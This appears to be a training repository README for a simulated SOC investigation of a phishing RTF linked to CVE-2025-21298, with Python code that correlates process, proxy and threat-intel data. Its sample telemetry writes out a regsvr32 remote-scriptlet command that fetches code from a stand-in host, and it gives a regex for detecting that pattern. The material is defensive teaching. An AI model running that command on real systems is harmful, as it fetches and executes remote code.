This repository documents a simulated SOC investigation involving a phishing-delivered malicious RTF attachment associated with CVE-2025-21298, a Windows OLE vulnerability.
The investigation focuses on identifying the attack chain, analyzing endpoint telemetry, reviewing network activity, and correlating threat intelligence to determine whether the alert represents a true security incident.
The investigation began after a SOC alert indicated potential exploitation of a Windows OLE vulnerability. The alert suggested that a malicious RTF document may have triggered suspicious activity on the endpoint.
During the investigation, evidence showed that the attachment was delivered via phishing email and that opening it led to suspicious command execution: OUTLOOK.EXE spawned cmd.exe, which invoked regsvr32 to retrieve a remote script from an external server.
• Phishing email delivered malicious RTF attachment
• Attachment linked to CVE-2025-21298 exploit activity
• OUTLOOK.EXE spawned cmd.exe on the endpoint
• regsvr32 used to retrieve a remote script (LOLBIN abuse)
• Outbound connection from the endpoint to malicious infrastructure detected
• Threat intelligence confirmed the destination IP as malicious
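As an added example (not part of the original investigation write-up or its tooling), the Python below reproduces the correlation an analyst performs over this chain: it flags an Office process spawning a shell, detects the regsvr32 remote-scriptlet pattern (/i:<url> with scrobj.dll), walks the parent chain back to OUTLOOK.EXE, and ties the fetch to the matching proxy connection and a threat-intel lookup. The hostnames, PIDs, timestamps, IP addresses, URL and blocklist are all constructed for the example; a benign regsvr32 registration is included to show it does not match.

```python
"""Added example: correlating endpoint process telemetry, proxy logs and a
threat-intel blocklist into an Office -> cmd.exe -> regsvr32 -> C2 chain.
Every host, PID, timestamp, IP, URL and TI entry below is constructed."""
import ntpath
import re
from datetime import datetime

# Constructed process-creation events (Sysmon EventID 1 style fields).
PROCESS_EVENTS = [
    {"ts": "2025-03-04T09:12:03Z", "host": "WS-042", "pid": 4120, "ppid": 880,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "OUTLOOK.EXE"},
    {"ts": "2025-03-04T09:14:41Z", "host": "WS-042", "pid": 5208, "ppid": 4120,
     "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "cmdline": "cmd.exe /c regsvr32 /s /n /u /i:http://203.0.113.10/update.sct scrobj.dll"},
    {"ts": "2025-03-04T09:14:42Z", "host": "WS-042", "pid": 5316, "ppid": 5208,
     "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "regsvr32 /s /n /u /i:http://203.0.113.10/update.sct scrobj.dll"},
    {"ts": "2025-03-04T09:30:00Z", "host": "WS-017", "pid": 7001, "ppid": 6990,
     "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\vendor.dll"},  # benign local DLL
]

# Constructed proxy log: "<ts> <host> <src_ip> <dst_ip> <method> <url> <status>"
PROXY_LOG = """\
2025-03-04T09:14:43Z WS-042 10.0.5.42 203.0.113.10 GET http://203.0.113.10/update.sct 200
2025-03-04T09:15:10Z WS-042 10.0.5.42 198.51.100.7 GET http://198.51.100.7/cdn/lib.js 200
2025-03-04T09:30:02Z WS-017 10.0.5.17 198.51.100.7 GET http://198.51.100.7/cdn/lib.js 200
"""

# Constructed stand-in for a threat-intel feed lookup.
TI_MALICIOUS_IPS = {"203.0.113.10"}

OFFICE_IMAGES = ("outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe")
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")
# regsvr32 remote scriptlet ("squiblydoo") pattern: /i:<url> ... scrobj.dll
REGSVR32_REMOTE = re.compile(r"/i:\s*(https?://\S+).*scrobj\.dll", re.IGNORECASE)


def _base(path):
    return ntpath.basename(path).lower()


def _t(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def find_office_child_shells(events):
    """Office application spawning a shell or script host: a document triggered execution."""
    return [e for e in events
            if _base(e["parent_image"]) in OFFICE_IMAGES and _base(e["image"]) in SHELLS]


def find_regsvr32_remote(events):
    """regsvr32 fetching a remote scriptlet. Returns (event, url) pairs."""
    hits = []
    for e in events:
        if _base(e["image"]) != "regsvr32.exe":
            continue
        m = REGSVR32_REMOTE.search(e["cmdline"])
        if m:
            hits.append((e, m.group(1)))
    return hits


def parse_proxy_log(text):
    rows = []
    for line in text.splitlines():
        if line.strip():
            ts, host, src, dst, method, url, status = line.split()
            rows.append({"ts": ts, "host": host, "src_ip": src, "dst_ip": dst,
                         "method": method, "url": url, "status": int(status)})
    return rows


def correlate(events, proxy_text, ti_ips, window_seconds=300):
    """Chain the signals on host and time: walk regsvr32 -> shell -> Office parent,
    then find the proxy request for the same URL shortly after process start."""
    proxy = parse_proxy_log(proxy_text)
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for reg, url in find_regsvr32_remote(events):
        shell = by_pid.get(reg["ppid"])
        office = by_pid.get(shell["ppid"]) if shell else None
        t0 = _t(reg["ts"])
        for c in proxy:
            if c["host"] != reg["host"] or c["url"] != url:
                continue
            if not 0 <= (_t(c["ts"]) - t0).total_seconds() <= window_seconds:
                continue
            findings.append({
                "host": reg["host"], "url": url, "dst_ip": c["dst_ip"],
                "chain": [_base(office["image"]) if office else None,
                          _base(shell["image"]) if shell else None, "regsvr32.exe"],
                "office_origin": bool(office) and _base(office["image"]) in OFFICE_IMAGES,
                "ti_hit": c["dst_ip"] in ti_ips,
            })
    return findings


def verdict(findings):
    """True positive only when the full chain closes with a TI-confirmed destination."""
    if any(f["office_origin"] and f["ti_hit"] for f in findings):
        return "true_positive"
    return "needs_review" if findings else "no_match"
```

The time window and the URL match are what keep the correlation honest: a regsvr32 remote fetch with no matching outbound request, or a destination the TI feed does not know, lands in "needs_review" rather than being auto-closed as a true positive.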
The investigation included analysis of:
• Email security logs
• Endpoint process telemetry
• Network proxy logs
• Malware reputation analysis
• Threat intelligence data
Evidence confirms that the alert represents a true positive security incident.
The malicious RTF attachment triggered suspicious execution behavior and resulted in the retrieval of a remote script from attacker-controlled infrastructure.
There is no evidence indicating that the malware was quarantined or removed from the endpoint, so the endpoint should be treated as still compromised until containment and remediation are confirmed.
This investigation was conducted in a controlled cybersecurity training environment.
The purpose of this repository is to demonstrate SOC investigation methodology and analytical reasoning.